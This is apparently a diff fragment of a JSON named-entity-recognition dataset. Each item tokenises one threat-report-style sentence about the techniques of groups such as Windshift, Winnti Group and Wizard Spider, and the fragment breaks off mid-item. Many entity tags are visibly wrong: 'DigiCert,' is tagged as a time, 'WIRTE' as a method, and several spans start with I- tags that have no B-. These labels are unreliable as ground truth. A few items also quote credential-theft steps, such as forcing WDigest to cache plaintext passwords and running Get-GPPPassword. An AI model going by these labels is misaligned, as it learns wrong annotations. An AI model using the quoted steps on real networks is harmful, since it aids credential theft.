{ + "tokens": [ + "WIRTE", + "has", + "used", + "PowerShell", + "for", + "script", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "used", + "`regsvr32.exe`", + "to", + "trigger", + "the", + "execution", + "of", + "a", + "malicious", + "script." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "sent", + "emails", + "to", + "intended", + "victims", + "with", + "malicious", + "MS", + "Word", + "and", + "Excel", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "obtained", + "and", + "used", + "Empire", + "for", + "post-exploitation", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "used", + "VBScript", + "in", + "its", + "operations." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WIRTE", + "has", + "used", + "HTTP", + "for", + "network", + "communication." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "used", + "a", + "simple", + "remote", + "shell", + "tool", + "that", + "will", + "call", + "back", + "to", + "the", + "C2", + "server", + "and", + "wait", + "for", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "used", + "search", + "order", + "hijacking", + "to", + "run", + "the", + "loader", + "Vcrodat." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "encrypted", + "the", + "payload", + "used", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "used", + "an", + "open-source", + "tool", + "to", + "exploit", + "a", + "known", + "Windows", + "privilege", + "escalation", + "vulnerability", + "(CVE-2016-0051)", + "on", + "unpatched", + "computers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "the", + "ability", + "to", + "download", + "additional", + "tools", + "from", + "the", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "used", + "Mimikatz", + "to", + "obtain", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "used", + "malicious", + ".exe", + "or", + ".dll", + "files", + "disguised", + "as", + "documents", + "or", + "images." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "named", + "the", + "malicious", + "DLL", + "the", + "same", + "name", + "as", + "DLLs", + "belonging", + "to", + "legitimate", + "software", + "from", + "various", + "security", + "vendors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Whitefly", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "used", + "a", + "Perl", + "script", + "for", + "information", + "gathering." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "used", + "a", + "script", + "to", + "gather", + "credentials", + "in", + "files", + "left", + "on", + "disk", + "by", + "OpenSSH", + "backdoors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "distributed", + "Windows", + "malware", + "via", + "drive-by", + "downloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "used", + "a", + "script", + "to", + "check", + "for", + "the", + "presence", + "of", + "files", + "created", + "by", + "OpenSSH", + "backdoors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "delivered", + "a", + "generic", + "Windows", + "proxy", + "Win32/Glubteta.M.", + "Windigo", + "has", + "also", + "used", + "multiple", + "reverse", + "proxy", + "chains", + "as", + "part", + "of", + "their", + "C2", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "used", + "a", + "script", + "to", + "detect", + "installed", + "software", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windigo", + "has", + "used", + "a", + "script", + "to", + "detect", + "which", + "Linux", + "distribution", + "and", + "version", + "is", + "currently", + "installed", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "compromised", + "websites", + "to", + "register", + "custom", + "URL", + "schemes", + "on", + "a", + "remote", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "tools", + "to", + "deploy", + "additional", + "payloads", + "to", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "revoked", + "certificates", + "to", + "sign", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "e-mail", + "attachments", + "to", + "lure", + "victims", + "into", + "executing", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "links", + "embedded", + "in", + "e-mails", + "to", + "lure", + "victims", + "into", + "executing", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "icons", + "mimicking", + "MS", + "Office", + "files", + "to", + "mask", + "malicious", + "executables.", + "Windshift", + "has", + "also", + "attempted", + "to", + "hide", + "executables", + "by", + "changing", + "the", + "file", + "extension", + "to", + "\".scr\"", + "to", + "mimic", + "Windows", + "screensavers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "string", + "encoding", + "with", + "floating", + "point", + "calculations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "malware", + "to", + "enumerate", + "active", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "created", + "LNK", + "files", + "in", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "malware", + "to", + "identify", + "installed", + "AV", + "and", + "commonly", + "used", + "forensic", + "and", + "malware", + "analysis", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "malware", + "to", + "identify", + "installed", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "sent", + "spearphishing", + "emails", + "with", + "attachment", + "to", + "harvest", + "credentials", + "and", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "sent", + "spearphishing", + "emails", + "with", + "links", + "to", + "harvest", + "credentials", + "and", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "fake", + "personas", + "on", + "social", + "media", + "to", + "engage", + "and", + "target", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "malware", + "to", + "identify", + "the", + "computer", + "name", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "malware", + "to", + "identify", + "the", + "username", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "Visual", + "Basic", + "6", + "(VB6)", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "tools", + "that", + "communicate", + "with", + "C2", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Windshift", + "has", + "used", + "WMI", + "to", + "collect", + "information", + "about", + "target", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "used", + "stolen", + "certificates", + "to", + "sign", + "its", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "has", + "registered", + "domains", + "for", + "C2", + "that", + "mimicked", + "sites", + "of", + "their", + "intended", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "has", + "used", + "a", + "program", + "named", + "ff.exe", + "to", + "search", + "for", + "specific", + "documents", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "has", + "downloaded", + "an", + "auxiliary", + "program", + "named", + "ff.exe", + "to", + "infected", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "looked", + "for", + "a", + "specific", + "process", + "running", + "on", + "infected", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Winnti", + "Group", + "used", + "a", + "rootkit", + "to", + "modify", + "typical", + "server", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "archived", + "data", + "into", + "ZIP", + "files", + "on", + "compromised", + "machines." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "batch", + "scripts", + "that", + "utilizes", + "WMIC", + "to", + "execute", + "a", + "BITSAdmin", + "transfer", + "of", + "a", + "ransomware", + "payload", + "to", + "each", + "compromised", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "Digicert", + "code-signing", + "certificates", + "for", + "some", + "of", + "its", + "malware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "obtained", + "code", + "signing", + "certificates", + "signed", + "by", + "DigiCert,", + "GlobalSign,", + "and", + "COMOOD", + "for", + "malware", + "payloads." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "used", + "Base64", + "encoding", + "to", + "obfuscate", + "an", + "Empire", + "service", + "and", + "PowerShell", + "commands." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "collected", + "and", + "staged", + "credentials", + "and", + "network", + "enumeration", + "information,", + "using", + "the", + "networkdll", + "and", + "psfin", + "TrickBot", + "modules." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "collected", + "data", + "from", + "a", + "compromised", + "host", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "shut", + "down", + "or", + "uninstalled", + "security", + "applications", + "on", + "victim", + "systems", + "that", + "might", + "prevent", + "ransomware", + "from", + "executing." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "identified", + "domain", + "admins", + "through", + "the", + "use", + "of", + "`net", + "group", + "\"Domain", + "admins\"", + "/DOMAIN`.", + "Wizard", + "Spider", + "has", + "also", + "leveraged", + "the", + "PowerShell", + "cmdlet", + "`Get-ADComputer`", + "to", + "collect", + "account", + "names", + "from", + "Active", + "Directory", + "data." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "created", + "and", + "used", + "new", + "accounts", + "within", + "a", + "victim's", + "Active", + "Directory", + "environment", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "administrative", + "accounts,", + "including", + "Domain", + "Admin,", + "to", + "move", + "laterally", + "within", + "a", + "victim", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "injected", + "malicious", + "DLLs", + "into", + "memory", + "with", + "read,", + "write,", + "and", + "execute", + "permissions." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "leveraged", + "ProtonMail", + "email", + "addresses", + "in", + "ransom", + "notes", + "when", + "delivering", + "Ryuk", + "ransomware." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "exfiltrated", + "domain", + "credentials", + "and", + "network", + "enumeration", + "information", + "over", + "command", + "and", + "control", + "(C2)", + "channels." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "exfiltrated", + "victim", + "information", + "using", + "FTP." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "exfiltrated", + "stolen", + "victim", + "data", + "to", + "various", + "cloud", + "storage", + "providers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "exploited", + "or", + "attempted", + "to", + "exploit", + "Zerologon", + "(CVE-2020-1472)", + "and", + "EternalBlue", + "(MS17-010)", + "vulnerabilities." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "accessed", + "victim", + "networks", + "by", + "using", + "stolen", + "credentials", + "to", + "access", + "the", + "corporate", + "VPN", + "infrastructure." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "file", + "deletion", + "to", + "remove", + "some", + "modules", + "and", + "configurations", + "from", + "an", + "infected", + "host", + "after", + "use." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "PowerShell", + "cmdlets", + "`Get-GPPPassword`", + "and", + "`Find-GPOPassword`", + "to", + "find", + "unsecured", + "credentials", + "in", + "a", + "compromised", + "network", + "group", + "policy." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-Way", + "O", + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "can", + "transfer", + "malicious", + "payloads", + "such", + "as", + "ransomware", + "to", + "compromised", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "B-HackOrg", + "O", + "B-Purp", + "B-Features", + "I-Purp", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "WMIC", + "and", + "vssadmin", + "to", + "manually", + "delete", + "volume", + "shadow", + "copies.", + "Wizard", + "Spider", + "has", + "also", + "used", + "Conti", + "ransomware", + "to", + "delete", + "volume", + "shadow", + "copies", + "automatically", + "with", + "the", + "use", + "of", + "vssadmin." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "Rubeus,", + "MimiKatz", + "Kerberos", + "module,", + "and", + "the", + "Invoke-Kerberoast", + "cmdlet", + "to", + "steal", + "AES", + "hashes." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "the", + "Invoke-Inveigh", + "PowerShell", + "cmdlets,", + "likely", + "for", + "name", + "service", + "poisoning." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "O", + "O", + "I-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "dumped", + "the", + "lsass.exe", + "memory", + "to", + "harvest", + "credentials", + "with", + "the", + "use", + "of", + "open-source", + "tool", + "LaZagne." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "stolen", + "credentials", + "to", + "copy", + "tools", + "into", + "the", + "<code>%TEMP%</code>", + "directory", + "of", + "domain", + "controllers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "created", + "local", + "administrator", + "accounts", + "to", + "maintain", + "persistence", + "in", + "compromised", + "networks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "staged", + "ZIP", + "files", + "in", + "local", + "directories", + "such", + "as,", + "`C:\\PerfLogs\\1\\`", + "and", + "`C:\\User\\1\\`", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "lured", + "victims", + "to", + "execute", + "malware", + "with", + "spearphishing", + "attachments", + "containing", + "macros", + "to", + "download", + "either", + "Emotet,", + "Bokbot,", + "TrickBot,", + "or", + "Bazar." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "lured", + "victims", + "into", + "clicking", + "a", + "malicious", + "link", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "scheduled", + "tasks", + "to", + "install", + "TrickBot,", + "using", + "task", + "names", + "to", + "appear", + "legitimate", + "such", + "as", + "WinDotNet,", + "GoogleTask,", + "or", + "Sysnetsf.", + "It", + "has", + "also", + "used", + "common", + "document", + "file", + "names", + "for", + "other", + "malware", + "binaries." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "modified", + "the", + "Registry", + "key", + "<code>HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest</code>", + "by", + "setting", + "the", + "<code>UseLogonCredential</code>", + "registry", + "value", + "to", + "<code>1</code>", + "in", + "order", + "to", + "force", + "credentials", + "to", + "be", + "stored", + "in", + "clear", + "text", + "in", + "memory.", + "Wizard", + "Spider", + "has", + "also", + "modified", + "the", + "WDigest", + "registry", + "key", + "to", + "allow", + "plaintext", + "credentials", + "to", + "be", + "cached", + "in", + "memory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "gained", + "access", + "to", + "credentials", + "via", + "exported", + "copies", + "of", + "the", + "ntds.dit", + "Active", + "Directory", + "database.", + "Wizard", + "Spider", + "has", + "also", + "created", + "a", + "volume", + "shadow", + "copy", + "and", + "used", + "a", + "batch", + "script", + "file", + "to", + "collect", + "NTDS.dit", + "with", + "the", + "use", + "of", + "the", + "Windows", + "utility,", + "ntdsutil." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "the", + "“net", + "view”", + "command", + "to", + "locate", + "mapped", + "network", + "shares." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "the", + "`Invoke-SMBExec`", + "PowerShell", + "cmdlet", + "to", + "execute", + "the", + "pass-the-hash", + "technique", + "and", + "utilized", + "stolen", + "password", + "hashes", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Wizard", + "Spider", + "has", + "used", + "macros", + 